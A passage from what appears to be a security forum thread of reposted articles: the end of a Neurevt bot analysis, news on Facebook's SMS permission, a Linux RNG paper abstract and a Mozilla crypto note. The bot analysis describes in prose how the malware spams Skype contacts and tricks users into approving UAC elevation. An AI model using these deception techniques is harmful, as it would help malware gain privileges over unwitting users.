server}’. The new process sets up a communication between itself and the Skype client with the Skype API. Then it starts to send Skype commands. The first command sent is ‘SEARCH FRIENDS’, which retrieves all the contacts of the logged-in user. For each contact, a ‘MESSAGE’ command will be sent to the Skype client to generate an IM message to send the chosen spam content. Bypassing UAC On a UAC-enabled system, if the malware needs to elevate its privilege, it doesn’t play some trick to avoid prompting the user or disable the UAC once for all. Instead, it will directly ‘ask’ the user for approval. The malware creates a process of ‘Cmd.exe’ and puts the malware’s file path in the command line argument. When the prompt window pops up, it shows that ‘Cmd.exe’, which is a Windows application, is asking for privilege elevation. Careless users tend to approve the request. Then a new process of the malware will be created by ‘Cmd.exe’ and it will inherit the system privileges of ‘Cmd.exe’. Clicking ‘show detail’ reveals the trick (Figure 18). Under some circumstances, the malware will give a fake warning about system corruption and ask the user to approve a ‘restoration utility’ to gain high privilege (Figure 19). If the user denies it, the malware will continue to pop up warnings and re-prompt the user several times. The malware prepares warnings in the following languages: Russian, Portuguese, German, French, Dutch, Arabic, Hindi, Persian, simplified Chinese, Turkish, Indonesian, Italian, Spanish, Polish, Japanese and Vietnamese. It will choose one of them according to the system’s default language locale to avoid language inconsistency raising the user’s suspicion. Conclusion As this analysis shows, the communication protocol has reserved enough space for new functionalities to be added in the future. There are unused fields in both the request and response structure and there are four streams in the response data that don’t have any code to handle. Though Neurevt has just entered the market, the bot’s author is likely to develop it rapidly - we will undoubtedly see new features of Neurevt soon. Sursa: Fortinet Blog | News and Threat Research NEUREVT Bot Analysis
-
[h=2]Facebook wants to read your SMS messages[/h]Written by Nick Farrell Targeted adverts Facebook's latest update to its hugely popular mobile app is creating a storm by asking British users if it can access their SMS and MMS messages. Thanks to the fact that Facebook is a US company, it means that the US spooks can tap the social notworking site to read your mails. While many of us can’t imagine what use the NSA will have knowing that my wife is coming home and I need to get more cat litter, there are some companies which should be jolly concerned – particularly now it is known that the US is stealing secrets from foreign organisations. Facebook simply wants to access more of your data to feed you more targeted ads, although Facebook Android engineer Franci Penov said that it needed to read your SMS’s to automatically intercept login approvals SMS messages for people that have turned on 2-factor authentication. It seems then I was right not to be dumb enough to give Google or Facebook my mobile number as this 2-factor authentication is more of a security nightmare than it is a help. The reason Facebook needs access to all your messages rather than just from a specific number, is that Android's permissions system does not allow for it to do that. He said that data is not sent back to the company's servers, which means it could not be used to help put adverts in your timeline based on what you have written in your messages. But in IT security the path to hell is paved with good intentions. It sounds to me that a system which is set up to read SMS messages can be a vulnerability waiting to happen. Assuming that it has not already. Sursa: Facebook wants to read your SMS messages
-
Analysis of the Linux Random Number Generator Zvi Gutterman Safend and The Hebrew University of Jerusalem Benny Pinkas University of Haifa Tzachy Reinman The Hebrew University of Jerusalem March 6, 2006 Abstract Linux is the most popular open source project. The Linux random number generator is part of the kernel of all Linux distributions and is based on generating randomness from entropy of operating system events. The output of this generator is used for almost every security protocol, including TLS/SSL key generation, choosing TCP sequence numbers, and file system and email encryption. Although the generator is part of an open source project, its source code (about 2500 lines of code) is poorly documented, and patched with hundreds of code patches. We used dynamic and static reverse engineering to learn the operation of this generator. This paper presents a description of the underlying algorithms and exposes several security vulnerabilities. In particular, we show an attack on the forward security of the generator which enables an adversary who exposes the state of the generator to compute previous states and outputs. In addition we present a few cryptographic flaws in the design of the generator, as well as measurements of the actual entropy collected by it, and a critical analysis of the use of the generator in Linux distributions on disk-less devices. 1 Introduction Randomness is a crucial resource for cryptography, and random number generators are therefore critical building blocks of almost all cryptographic systems. The security analysis of almost any system assumes a source of random bits, whose output can be used, for example, for the purpose of choosing keys or choosing random nonces. Weak random values may result in an adversary ability to break the system, as was demonstrated by breaking the Netscape implementation of SSL [8], or predicting Java session-ids [11]. Since a physical source of randomness is often too costly, most systems use a pseudo-random number generator. The state of the generator is seeded, and periodically refreshed, by entropy which is gathered from physical sources (such as from timing disk operations, or from a human interface). The state is updated using an algorithm which updates the state and outputs pseudo-random bits. This paper studies the Linux pseudo-random number generator (which we denote as the LRNG). This is the most popular open source pseudo-random number generator, and it is embedded in all running Linux environments, which include desktops, servers, PDAs, smart phones, media centers, and even routers. Properties required of pseudo-random number generators. A pseudo-random number generator must be secure against external and internal attacks. The attacker is assumed to know the code of the generator, and might have partial knowledge of the entropy used for refreshing the generator’s state. We list here the most basic security requirements, using common terminology (e.g., of [3]). (A more detailed list of potential vulnerabilities appears in [14].) Download: http://www.pinkas.net/PAPERS/gpr06.pdf
-
[h=2]Using the Mozilla crypto object from JavaScript[/h] Mozilla defines a special JavaScript object to allow web pages access to certain cryptographic-related services. These services are a balance between the functionality web pages need and the requirement to protect users from malicious web sites. Most of these services are available via the DOM window object as window.crypto. Services are provided to enable: smart card events, generating certificate requests, importing user certs, generating random numbers, logging out of your tokens, and signing text. Articol: https://developer.mozilla.org/en-US/docs/JavaScript_crypto
-
Care CSS, style.css? Cum sa dispara?